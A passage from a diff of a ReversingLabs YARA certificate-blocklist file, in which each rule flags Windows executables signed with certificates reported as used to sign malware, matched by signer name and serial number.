"fbb2124b934c270739f564317526d5b23b996364372426485d7c994a83293866" score = 75 quality = 90 tags = "INFO, FILE" @@ -14962,22 +34753,22 @@ rule REVERSINGLABS_Cert_Blocklist_2E07A8D6E3B25Ae010C8Ed2C4Ab0Fb37 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Emurasoft, Inc." and pe.signatures[i].serial=="2e:07:a8:d6:e3:b2:5a:e0:10:c8:ed:2c:4a:b0:fb:37" and 1650499200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SMACKTECH SOFTWARE LIMITED" and pe.signatures[i].serial=="41:52:16:9f:22:45:4e:d6:04:d0:35:55:b7:af:b1:75" and 1595808000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_30B4Eeebd88Fd205Acc8577Bbaed8655 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_01C88Ccbd219500139D1Af138A9E898E : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "27c60ade-41e1-5ba4-be8d-275edc01b5ba" + id = "e3bd6be6-461c-56fd-8dfd-8205845f731e" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L10606-L10622" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "673ec5a1cacb9a7be101a4a533baf5a1eab4e6dd8721c69e56636701c5303c72" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L4610-L4626" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "d1acb0a7d6e20158797e77c066be42548cee9293fa94f24f936a95977ac16d91" score = 75 quality = 90 tags = "INFO, FILE" @@ -14987,22 +34778,22 @@ rule REVERSINGLABS_Cert_Blocklist_30B4Eeebd88Fd205Acc8577Bbaed8655 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Enforcer Srl" and pe.signatures[i].serial=="30:b4:ee:eb:d8:8f:d2:05:ac:c8:57:7b:ba:ed:86:55" and 1646179200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Raymond Yanagita" and pe.signatures[i].serial=="01:c8:8c:cb:d2:19:50:01:39:d1:af:13:8a:9e:89:8e" and 1593041280<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_B3391A6C1B3C6836533959E2384Ab4Ca : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_41D05676E0D31908Be4Dead3486Aeae3 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "ab274ae3-0884-517a-a221-2c952fc9d74c" + id = "bca4533d-e721-5f23-984a-3b741ca8b53f" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L10624-L10642" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "38e38acfbfbf63b7179d2f8656f70224afa9269a7bdecd10ccbbbd92a6a216d3" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L4628-L4644" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "c4905f02c74df6d05b3f9a6fe2c4f5f32a02bb10da4db929314be043be76d703" score = 75 quality = 90 tags = "INFO, FILE" @@ -15012,22 +34803,22 @@ rule REVERSINGLABS_Cert_Blocklist_B3391A6C1B3C6836533959E2384Ab4Ca : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VERIFIED SOFTWARE LLC" and (pe.signatures[i].serial=="00:b3:39:1a:6c:1b:3c:68:36:53:39:59:e2:38:4a:b4:ca" or pe.signatures[i].serial=="b3:39:1a:6c:1b:3c:68:36:53:39:59:e2:38:4a:b4:ca") and 1595462400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Rov SP Z O O" and pe.signatures[i].serial=="41:d0:56:76:e0:d3:19:08:be:4d:ea:d3:48:6a:ea:e3" and 1594857600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_05D50A0E09Bb9A836Ffb90A3 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_8Cff807Edaf368A60E4106906D8Df319 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "f2e0959f-3bc6-5552-8f7a-f84672fb597d" + id = "c964a540-6124-52f0-b17f-692cd4b9b3af" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L10644-L10660" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "1bd1960cd6dd8bf83472dc2b1809b84ceb3db68a5e6c3ba68f28ad922230b2ed" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L4646-L4664" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "6fc98519faf218d90bb4e01821e6014e009c0b525cfd3c906a64ef82bc20beda" score = 75 quality = 90 tags = "INFO, FILE" @@ -15037,22 +34828,22 @@ rule REVERSINGLABS_Cert_Blocklist_05D50A0E09Bb9A836Ffb90A3 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Toliz Info Tech Solutions INC." and pe.signatures[i].serial=="05:d5:0a:0e:09:bb:9a:83:6f:fb:90:a3" and 1643892810<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "KRAFT BOKS OOO" and (pe.signatures[i].serial=="00:8c:ff:80:7e:da:f3:68:a6:0e:41:06:90:6d:8d:f3:19" or pe.signatures[i].serial=="8c:ff:80:7e:da:f3:68:a6:0e:41:06:90:6d:8d:f3:19") and 1598334455<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_0A2787Fbb4627C91611573E323584113 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_A3E62Be1572293Ad618F58A8Aa32857F : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "64848927-6a60-5ea9-bae5-7d15c3f35ca6" + id = "2f67abf3-390a-5c67-afed-e586e20692af" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L10662-L10678" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "efa352beafb56b95a89554bc8929f8e01a4da46eef1f6cf8a1487a2a06bc1b3e" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L4666-L4684" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "f849898465bc651f19f6f1b54315c061466d8c5860ecf1a07f54c8c8292f6a95" score = 75 quality = 90 tags = "INFO, FILE" @@ -15062,22 +34853,22 @@ rule REVERSINGLABS_Cert_Blocklist_0A2787Fbb4627C91611573E323584113 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "exxon.com" and pe.signatures[i].serial=="0a:27:87:fb:b4:62:7c:91:61:15:73:e3:23:58:41:13" and 1640822400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ISIDA, TOV" and (pe.signatures[i].serial=="00:a3:e6:2b:e1:57:22:93:ad:61:8f:58:a8:aa:32:85:7f" or pe.signatures[i].serial=="a3:e6:2b:e1:57:22:93:ad:61:8f:58:a8:aa:32:85:7f") and 1596585600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_1D36C4F439D651503589318F : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_672D4428450Afcc24Fc60969A5063A3E : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "f72b8e2c-b799-5aec-a69a-e42cdb3e2ae1" + id = "fcd8e808-dbd6-5903-868a-0aa4541e6321" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L10680-L10696" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "73dc3c01041d50100a8d5519afe1a80f470c30175f9ad1bf76ac287ac199a959" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L4686-L4702" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "8f5927e96109184bad7de4513994fd1021fe1cc5977e60fa72d808df95cb4516" score = 75 quality = 90 tags = "INFO, FILE" @@ -15087,22 +34878,22 @@ rule REVERSINGLABS_Cert_Blocklist_1D36C4F439D651503589318F : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "REDWOOD MARKETING SOLUTIONS INC." and pe.signatures[i].serial=="1d:36:c4:f4:39:d6:51:50:35:89:31:8f" and 1651518469<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "MEP, OOO" and pe.signatures[i].serial=="67:2d:44:28:45:0a:fc:c2:4f:c6:09:69:a5:06:3a:3e" and 1597381260<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_26F855A25890B749578F13E4B9459768 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Df479E14A70C7970A4De3Dd3E4Bb0318 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "d873b0d4-dff5-5ee2-a70f-b067602b217e" + id = "465fc41c-920d-55e6-8616-a51d1f77b158" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L10698-L10714" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "35bfa39ef8f03d10af884f288278ea6ad3aff31cbae111057c2b619c6dc0a752" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L4704-L4722" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "35b1f04cf5d5d1d89db537bf75737e3af5945e594f4d4231e9ae3e7fba52fc0d" score = 75 quality = 90 tags = "INFO, FILE" @@ -15112,22 +34903,22 @@ rule REVERSINGLABS_Cert_Blocklist_26F855A25890B749578F13E4B9459768 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Boo\\xE2\\x80\\x99s Q & Sweets Corporation" and pe.signatures[i].serial=="26:f8:55:a2:58:90:b7:49:57:8f:13:e4:b9:45:97:68" and 1645401600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SOFTWARE HUB IT LTD" and (pe.signatures[i].serial=="00:df:47:9e:14:a7:0c:79:70:a4:de:3d:d3:e4:bb:03:18" or pe.signatures[i].serial=="df:47:9e:14:a7:0c:79:70:a4:de:3d:d3:e4:bb:03:18") and 1591660800<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_0F1Ae2239Bb96C5Aef49D0Ae50266912 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_2924785Fd7990B2D510675176Dae2Bed : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "44c878ab-75b2-5cd3-a019-94982a508e0f" + id = "6898e95c-ee31-57a3-b764-99bf9008d0fe" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L10716-L10732" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "4f88df4fc2f4cd89aa177ce09caab3e2660267ae883f7ab54c22a9ba1657bad0" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L4724-L4740" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "e308ca5f24ed5811e947289caf9aa820a16b08ea183c7aa9826f8a726fb5c3cf" score = 75 quality = 90 tags = "INFO, FILE" @@ -15137,22 +34928,22 @@ rule REVERSINGLABS_Cert_Blocklist_0F1Ae2239Bb96C5Aef49D0Ae50266912 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Aarav Consulting Inc." and pe.signatures[i].serial=="0f:1a:e2:23:9b:b9:6c:5a:ef:49:d0:ae:50:26:69:12" and 1653004800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Neoopt LLC" and pe.signatures[i].serial=="29:24:78:5f:d7:99:0b:2d:51:06:75:17:6d:ae:2b:ed" and 1595000258<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_1Deea179F5757Fe529043577762419Df : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_F4D2Def53Bccb0Dd2B7D54E4853A2Fc5 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "ef29c813-e914-5766-990f-76c14d18ec79" + id = "3c1bec34-9eac-5c7c-bb36-2e24b6ee52dc" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L10734-L10750" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "67c3d3496caf54ca0b1afc4d1dcc902e2f3632ac6708f85e163d427b567d098f" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L4742-L4760" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "9991f44b8e984bd79269c44999481258d94bec9c21b154b63c6c30ae52344b3c" score = 75 quality = 90 tags = "INFO, FILE" @@ -15162,22 +34953,22 @@ rule REVERSINGLABS_Cert_Blocklist_1Deea179F5757Fe529043577762419Df : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SPIRIT CONSULTING s. r. o." and pe.signatures[i].serial=="1d:ee:a1:79:f5:75:7f:e5:29:04:35:77:76:24:19:df" and 1645401600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "PETROYL GROUP, TOV" and (pe.signatures[i].serial=="00:f4:d2:de:f5:3b:cc:b0:dd:2b:7d:54:e4:85:3a:2f:c5" or pe.signatures[i].serial=="f4:d2:de:f5:3b:cc:b0:dd:2b:7d:54:e4:85:3a:2f:c5") and 1598347687<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_5B1F9Ec88D185631Ab032Dbfd5166C0D : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_03Bf9Ef4Cf037A2385649026C3Da9D3E : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "51c596cd-3033-51ef-914f-310d2bbfbd5f" + id = "d7396af1-2eae-594a-9933-3d148503c0ea" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L10752-L10768" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "dec9d43c6911deb5f35c45692bfd6ef47f85d955f5e59041e58a1f0d2fc306e3" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L4762-L4778" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "14196bad586b1349e6e8a1eb5621ce0d8d346ff8021c8ef80804de1533fd40d9" score = 75 quality = 90 tags = "INFO, FILE" @@ -15187,22 +34978,22 @@ rule REVERSINGLABS_Cert_Blocklist_5B1F9Ec88D185631Ab032Dbfd5166C0D : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "TOPFLIGHT GROUP LIMITED" and pe.signatures[i].serial=="5b:1f:9e:c8:8d:18:56:31:ab:03:2d:bf:d5:16:6c:0d" and 1656028800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "COLLECTIVE SOFTWARE INC." and pe.signatures[i].serial=="03:bf:9e:f4:cf:03:7a:23:85:64:90:26:c3:da:9d:3e" and 1595371955<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_58Af00Ce542760Fc116B41Fa92E18589 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_790177A54209D55560A55Db97C5900D6 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "bb58ae8d-ef28-5644-abe8-2d4d8c892e95" + id = "cc49f477-269a-55af-8344-39d2f24c1e7f" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L10770-L10786" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "0ff773d252e5e0402171ae15d7ab43bcfd313eb8c326ed5f128a89ec43386a52" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L4780-L4796" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "07c8e21fe604b481beebae784eb49e32bebee70e749581a55313bfbc757752e2" score = 75 quality = 90 tags = "INFO, FILE" @@ -15212,22 +35003,22 @@ rule REVERSINGLABS_Cert_Blocklist_58Af00Ce542760Fc116B41Fa92E18589 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DICKIE MUSDALE WINDFARM LIMITED" and pe.signatures[i].serial=="58:af:00:ce:54:27:60:fc:11:6b:41:fa:92:e1:85:89" and 1654819200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "MAK GmbH" and pe.signatures[i].serial=="79:01:77:a5:42:09:d5:55:60:a5:5d:b9:7c:59:00:d6" and 1594080000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_25Ba18A267D6D8E08Ebc6E2457D58D1E : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_048F7B5F67D8E2B3030F75Eb7Be2713D : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "eb06576e-11ea-58ba-aa19-68c161f6aa68" + id = "e746516a-c51f-5cb8-8157-a5fe1f2c7abe" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L10788-L10804" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "174fe170c26a8197486e7b390d9fce4da61fb68ee5dc9486d43dbeb3cf659c3a" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L4798-L4814" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "6d1b47f3c9d7b90a5470f83a848adeebff2cf9341a1eb41ca8b45d08b469b17f" score = 75 quality = 90 tags = "INFO, FILE" @@ -15237,22 +35028,22 @@ rule REVERSINGLABS_Cert_Blocklist_25Ba18A267D6D8E08Ebc6E2457D58D1E : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "5Y TECHNOLOGY LIMITED" and pe.signatures[i].serial=="25:ba:18:a2:67:d6:d8:e0:8e:bc:6e:24:57:d5:8d:1e" and 1648684800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "RITEIL SERVIS, OOO" and pe.signatures[i].serial=="04:8f:7b:5f:67:d8:e2:b3:03:0f:75:eb:7b:e2:71:3d" and 1591142400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_12Df5Ff3460979Cec1288D874A9Fbf83 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_082023879112289Bf351D297Cc8Efcfc : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "9158c9a5-37fc-54bc-9601-3aa347a421ab" + id = "94a4e3d6-2d0a-5e5d-9ae8-574ef9be017e" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L10806-L10822" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "3d4b5e56962d04bc35451eeab4c1870c8653c9afcbb28dc6bad7cfb1711e9df1" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L4816-L4832" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "58bec160445765ce45a26bf9d96ba6cfe61eee31e0953009d40a7ec64920c677" score = 75 quality = 90 tags = "INFO, FILE" @@ -15262,22 +35053,22 @@ rule REVERSINGLABS_Cert_Blocklist_12Df5Ff3460979Cec1288D874A9Fbf83 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "FORWARD MUSIC AGENCY SRL" and pe.signatures[i].serial=="12:df:5f:f3:46:09:79:ce:c1:28:8d:87:4a:9f:bf:83" and 1599091200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "STA-R TOV" and pe.signatures[i].serial=="08:20:23:87:91:12:28:9b:f3:51:d2:97:cc:8e:fc:fc" and 1573430400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_Df2547B2Cab5689A81D61De80Eaaa3A2 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0D53690631Dd186C56Be9026Eb931Ae2 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "1e76a088-b0f2-54d6-b730-77552c74d7bd" + id = "4f60613c-4162-5b3d-989f-f79a06450f4d" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L10824-L10842" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "cde89ae5b77ff6833fe642bdd74e81763ef068e31c07e7881906e4e4a5939942" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L4834-L4850" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "3d0a80c062800f935fa3837755e8a91245e01a4e2450a05fecab5564cb62c15c" score = 75 quality = 90 tags = "INFO, FILE" @@ -15287,22 +35078,22 @@ rule REVERSINGLABS_Cert_Blocklist_Df2547B2Cab5689A81D61De80Eaaa3A2 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "FORWARD MUSIC AGENCY SRL" and (pe.signatures[i].serial=="00:df:25:47:b2:ca:b5:68:9a:81:d6:1d:e8:0e:aa:a3:a2" or pe.signatures[i].serial=="df:25:47:b2:ca:b5:68:9a:81:d6:1d:e8:0e:aa:a3:a2") and 1657756800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "STA-R TOV" and pe.signatures[i].serial=="0d:53:69:06:31:dd:18:6c:56:be:90:26:eb:93:1a:e2" and 1592190240<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_28B691272719B1Ee : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_32119925A6Ce4710Aecc4006C28E749F : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "8f1d125a-de0f-525b-8dac-702bc123cc53" + id = "cfd51cb8-bd04-5ede-a73e-e924815a01f0" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L10844-L10860" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "0bd973f415b7cfa0858c705c4486da9f181c7259af01d1cff486fb6b8e8e775b" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L4852-L4868" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = 